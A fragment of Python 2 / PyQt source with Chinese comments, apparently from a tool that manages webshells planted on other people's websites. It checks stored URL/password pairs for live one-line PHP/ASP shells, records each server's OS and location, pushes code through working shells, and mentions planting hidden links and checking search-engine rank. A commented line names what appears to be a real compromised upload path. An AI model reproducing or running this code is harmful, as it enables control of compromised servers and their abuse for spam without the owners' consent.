def php_cs_js(self):
self.ui.main_pushButton_PHP.setEnabled(0) #给改成禁用
int_model = self.ui.SQLite_tableView.selectionModel() #获取选中编号
model = self.ui.SQLite_tableView.model()#index = model.index(3,1)#data = model.data(index)#print data.toString()
PHP_data=self.ui.textEdit_PHP_data.toPlainText() #获取内容
self.write2file("data.php",PHP_data)
PHP_data=str(PHP_data) #.decode('utf-8').encode('gbk')
PHP_data=self.x0_zs(PHP_data) #清除注释<?php ?>
PHP_data=self.x1_zs(PHP_data) #清除注释/* */
PHP_data=self.x2_zs(PHP_data) #清除//注释
PHP_data=self.open_file_null(PHP_data) #清除空行
#print PHP_data
for index in int_model.selectedRows(): #// 对于被选中的每一行
try:
int_index=index.row()#获取行号
s0= model.data(model.index(int_index,0)).toString()
s1= model.data(model.index(int_index,1)).toString()
#s0="http://localhost/long.php"
#s1="long123"
if g.bool_asp_php(s0)=="php":
fiel_data=self.yijuhua_php_js(str(s0),str(s1),str(PHP_data))
data=self.web_rand_file_data(str(s0),str(s1),str(fiel_data)) #HTML内容
self.write2file("log/"+br_pr_sogo.get_domain(str(s0),0)+"_"+g.bool_asp_php(s0)+".html",data) #写入文件
except BaseException, e:
print(str(e))
self.ui.main_pushButton_PHP.setEnabled(1)
return 0
def ASP_cs_js(self):
self.ui.main_pushButton_ASP.setEnabled(0) #给改成禁用
int_model = self.ui.SQLite_tableView.selectionModel() #获取选中编号
model = self.ui.SQLite_tableView.model()#index = model.index(3,1)#data = model.data(index)#print data.toString()
ASP_data=self.ui.textEdit_ASP_data.toPlainText() #获取内容
self.write2file("data.asp",ASP_data)
ASP_data=str(ASP_data) #.decode('utf-8').encode('gbk')
ASP_data=self.asp_x0_zs(ASP_data) #清除<% %>
ASP_data=self.asp_x2_zs(ASP_data) #清除'注释
ASP_data=self.open_file_null(ASP_data) #清除空行
ASP_data=self.asp_x2_zs(ASP_data) #清除'注释
#print ASP_data
for index in int_model.selectedRows(): #// 对于被选中的每一行
try:
int_index=index.row()#获取行号
s0= model.data(model.index(int_index,0)).toString()
s1= model.data(model.index(int_index,1)).toString()
# s0="http://192.168.1.100/long.asp"
# s1="long123"
if g.bool_asp_php(s0)=="asp":
fiel_data=self.yijuhua_ASP_js(str(s0),str(s1),str(self.str_char(ASP_data)))
#print fiel_data
data=self.web_rand_file_data(str(s0),str(s1),str(fiel_data)) #HTML内容
self.write2file("log/"+br_pr_sogo.get_domain(str(s0),0)+"_"+g.bool_asp_php(s0)+".html",data) #写入文件
except BaseException, e:
print(str(e))
self.ui.main_pushButton_ASP.setEnabled(1)
return 0
def yjh_cs_2(self): #测试一句话是否连接成功
global yu_2, yu_3
self.ui.main_pushButton_2.setEnabled(0) #给改成禁用
int_model = self.ui.SQLite_tableView.selectionModel() #获取选中编号
model = self.ui.SQLite_tableView.model(
) #index = model.index(3,1)#data = model.data(index)#print data.toString()
h = qqwry.C_hoset()
for index in int_model.selectedRows(): #// 对于被选中的每一行
try:
int_index = index.row() #获取行号
s0 = model.data(model.index(int_index, 0)).toString()
s1 = model.data(model.index(int_index, 1)).toString()
data_time2 = time.strftime('%Y-%m-%d %H:%M:%S',
time.localtime(time.time()))
data_time = time.mktime(
time.strptime(data_time2, '%Y-%m-%d %H:%M:%S')) #转化成时间戳
if s0 == "" or len(s0) <= 7:
yu_3 += 1 #失败多少条
self.tableView_add(int_index, None, None, u"null", None,
None, None, None, None, None,
data_time2) #添加数据
sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
data_time, str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
continue #跳过
# url="http://www.sttc.cn/uploadfile/2013/0621/thumb_6_6_.Php.JPG%20%20%20%20%20%20%20Php"
# PASS="******"
if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
yu_2 += 1 #成功多少条
#self.tableView_add(int_index,None,None,u"ok",None,None,None,data_time) #添加数据
#sql_data="update shell set zts3='ok',time2s7='%s' where urls1='%s' and passwods2='%s'"%(data_time,str(s0),str(s1))
#yijuhua_win_linux(url,PASS): #URL地址 ,密码 返回操作系统
win_linux = yijuhua.yijuhua_win_linux(
str(s0), str(s1)) #URL地址 ,密码 返回操作系统
WLWZ = h.www_data(qqwry.url_www(str(s0)))
WLWZ = u"%s" % (WLWZ)
if g.bool_asp_php(str(s0)) == "asp":
win_linux = "WinNT"
self.tableView_add(int_index, None, None, u"ok",
str(win_linux), None, None, None, WLWZ,
None, data_time2) #添加数据
sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
str(win_linux), WLWZ, data_time, str(s0), str(s1))
else:
yu_3 += 1 #失败多少条
self.tableView_add(int_index, None, None, u"No", u"No",
None, None, None, None, None,
data_time2) #添加数据
sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
data_time, str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
except BaseException, e:
print(str(e))
self.ui.main_pushButton_2.setEnabled(1)
return 0
def db_cs(self, ID): #测试还没有测试过的一句话
try:
global yu_1, yu_2, yu_3
sql_data = ""
if ID == 0:
sql_data = "select * from shell where zts3 is null"
if ID == 1:
sql_data = "select * from shell where zts3='ok'"
if ID == 2:
sql_data = "select * from shell where zts3='No'"
self.sql3.conn.commit() # 获取到游标对象
cur = self.sql3.conn.cursor() # 用游标来查询就可以获取到结果
cur.execute(sql_data) # 获取所有结果
res = cur.fetchall() #从结果中取出所有记录
for line in res:
s0 = str(line[0])
s1 = str(line[1])
data_time2 = time.strftime('%Y-%m-%d %H:%M:%S',
time.localtime(time.time()))
data_time = time.mktime(
time.strptime(data_time2, '%Y-%m-%d %H:%M:%S')) #转化成时间戳
if s0 == "" or len(s0) <= 7:
yu_3 += 1 #失败多少条
sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
data_time, str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
continue #跳过
if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
yu_2 += 1 #成功多少条
win_linux = yijuhua.yijuhua_win_linux(
str(s0), str(s1)) #URL地址 ,密码 返回操作系统
WLWZ = self.h.www_data(qqwry.url_www(str(s0)))
WLWZ = u"%s" % (WLWZ)
if g.bool_asp_php(str(s0)) == "asp":
win_linux = "WinNT"
sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
str(win_linux), WLWZ, data_time, str(s0), str(s1))
self.br_pr_sogo(s0, s1) #获取 百度 谷歌 搜狗 权重
print u"URL:%s--passwod:%s-----ok-----%s" % (str(s0),
str(s1), WLWZ)
self.messagebox()
else:
yu_3 += 1 #失败多少条
sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
data_time, str(s0), str(s1))
self.messagebox()
print u"URL:%s--passwod:%s-----No" % (str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
except BaseException, e:
print(str(e))
return 0
def webshell_url(self):
try:
if Class_Queue.webscan_url.empty(): #判断队列是否为空
print u"thread:%d webscan_url 已经没有可操作的URL了" % (self.TH)
time.sleep(60)
URL = Class_Queue.webscan_url.get(0.5) #get()方法从队头删除并返回一个项目
url = URL.split("|")
if len(url) <= 1:
return 0
#url[0],url[1]
if g.bool_asp_php(url[0]) == "php":
data = u"thread:%d url:%s passwod:%s" % (self.TH, url[0],
url[1])
if eval.cs(url[0], url[1]):
print u"php_ok.txt%s 链接成功" % (data)
websehll = "%s|%s" % (url[0], url[1])
self.TXT_file_add("php_ok.txt", str(websehll))
self.php_webshell(url[0], url[1]) #PHP处理WEBSHELL 挂链
return 0
else:
websehll = "%s|%s" % (url[0], url[1])
self.TXT_file_add("php_no.txt", str(websehll))
print u"php_no.txt%s 链接失败" % (data)
return 0
if g.bool_asp_php(url[0]) == "asp":
websehll = "%s|%s" % (url[0], url[1])
self.TXT_file_add("asp_ok.txt", str(websehll))
return 0
else:
websehll = "%s|%s" % (url[0], url[1])
self.TXT_file_add("asp_no.txt", str(websehll))
if g.bool_asp_php(url[0]) == "null":
websehll = "%s|%s" % (url[0], url[1])
self.TXT_file_add("null.txt", str(websehll))
return 0
except Exception, e:
#print e
return 0
def br_pr_sogo_4(self): #查询\WEBSHELL 状态
self.ui.pb_pushButton_1.setEnabled(0) #给改成禁用
int_model = self.ui.tableView.selectionModel() #获取选中编号
model = self.ui.tableView.model(
) #index = model.index(3,1)#data = model.data(index)#print data.toString()
for index in int_model.selectedRows(): #// 对于被选中的每一行
try:
int_index = index.row() #获取行号
s0 = model.data(model.index(int_index, 0)).toString()
s1 = model.data(model.index(int_index, 1)).toString()
if s0 == "" or len(s0) <= 7:
self.tableView_add(int_index, None, None,
u"null") #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % (
str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
continue #跳过
#print str(s0)
if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
win_linux = "WinNT"
if g.bool_asp_php(s0) == "php":
win_linux = yijuhua.yijuhua_win_linux(str(s0), str(s1))
www_wlwz = yijuhua.www_wlwz(str(s0))
self.tableView_add(int_index, None, None, u"ok",
str(win_linux), None, None,
www_wlwz) #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='ok',win='%s',wl='%s' where url='%s' and passwod='%s'" % (
str(win_linux), urllib.quote(
str(www_wlwz)), str(s0), str(s1))
else:
self.tableView_add(int_index, None, None,
u"No") #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % (
str(s0), str(s1))
#print sql_data
self.sql3.mysqlite3_update(sql_data)
except BaseException, e:
pass
def br_pr_sogo_4(self): #查询\WEBSHELL 状态
self.ui.pushButton_4.setEnabled(0) #给改成禁用
int_model = self.ui.tableView.selectionModel() #获取选中编号
model = self.ui.tableView.model(
) #index = model.index(3,1)#data = model.data(index)#print data.toString()
for index in int_model.selectedRows(): #// 对于被选中的每一行
try:
int_index = index.row() #获取行号
s0 = model.data(model.index(int_index, 0)).toString()
s1 = model.data(model.index(int_index, 1)).toString()
if s0 == "" or len(s0) <= 7:
self.tableView_add(int_index, None, None,
u"null") #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % (
str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
continue #跳过
#print str(s0)
if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
#self.tableView_add(int_index,None,None,u"ok",None,None,None,data_time) #添加数据
#sql_data="update shell set zts3='ok',time2s7='%s' where urls1='%s' and passwods2='%s'"%(data_time,str(s0),str(s1))
#yijuhua_win_linux(url,PASS): #URL地址 ,密码 返回操作系统
self.tableView_add(int_index, None, None,
u"ok") #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='ok' where url='%s' and passwod='%s'" % (
str(s0), str(s1))
else:
self.tableView_add(int_index, None, None,
u"No") #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % (
str(s0), str(s1))
#print sql_data
self.sql3.mysqlite3_update(sql_data)
except BaseException, e:
pass